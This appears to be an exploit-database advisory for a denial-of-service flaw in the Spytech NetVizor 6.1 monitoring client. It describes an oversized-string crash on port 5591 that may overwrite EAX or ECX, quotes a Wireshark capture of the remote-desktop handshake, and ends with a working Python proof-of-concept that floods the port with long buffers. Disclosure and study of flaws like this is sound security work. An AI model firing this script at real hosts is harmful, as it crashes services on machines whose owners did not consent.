# Author: loneferret of Offensive Security # Product: Spytech VetVizor # Version: Build Release 6.1 # Vendor Site: hhttp://www.spytech-web.com/ # Software Download: http://www.spytech-web.com/download.shtml#netvizor # Descriptions: # NetVizor is the latest in network monitoring software. Monitor your entire network from # one centralized location! NetVizor allows you to track workstations and individual users # that may use multiple PC's on a network. NetVizor records everything users do - from keystrokes # typed to email activity. NetVizor can show you what everyone is doing on your # network, in real-time, with a single mouse click via its visual network overview and # real-time activity ticker. # NetVizor Client DoS: # Using the NetVizor "Viewer", the administrator can initiate a "RDP" like connection to a # client workstation with the NetVizor "Client" installed. The port used on the client # host is 5591, which listens on all interfaces by default. This port is also used by the # "Viewer" application to grab screenshots of monitored hosts. # It's possible to have the service crash by sending an overly large string. And it some # cases this will will overwrite EAX or ECX. Regardless if the registers are overwritten # or not, the "Viewer" application will no longer be able to initiate a remote desktop # connection nor will it be able to grab a screen capture. # Wireshark capture: # This snip is from a successful connection between the "Viewer" application and the client # when initiating it's Remote Desktop session. Converting this to HEX and using it in our # PoC actually triggers it, unfortunately with no proper listener nothing really happens. #+From the Viewer #launchremotedesktop # .r...\Yv.r..+..r . # x.......r...r........-.......|...h........r.....r....-.......|....s...r..$..r,s...s.....r,s.....r... # ........h............s...SYvQ.. # ....h...w/.w...v..............2..........SYv...r...r..5.....-............s..Hk..h... #+From client # Remote desktop started: C:\PROGRA~1\nvclient\rds.exe #+And the above as seen from Wireshark. launchremotedesktop .r...\Yv.r..+..r . x.......r...r........-.......|...h........r.....r....-.......|....s...r..$..r,s...s.....r,s.....r... ........h............s...SYvQ.. ....h...w/.w...v..............2..........SYv...r...r..5.....-............s..Hk..h...Remote desktop started: C:\PROGRA~1\nvclient\rds.exe # PoC: # In the following script, when EAX or ECX is overwritten it will be with the 'B's. # As always, if someone wants to investigate further go right ahead. # Just be nice. #!/usr/bin/python import socket buffer1= "[AAAA]" * 500 buffer2= "BBBB" * 6000 print "\nSending buffer 1" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('xxx.xxx.xxx.xxx',5591)) s.send(buffer1) s.close() raw_input() print "\nSending buffer 2" s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect(('xxx.xxx.xxx.xxx',5591)) s2.send(buffer2) s2.close()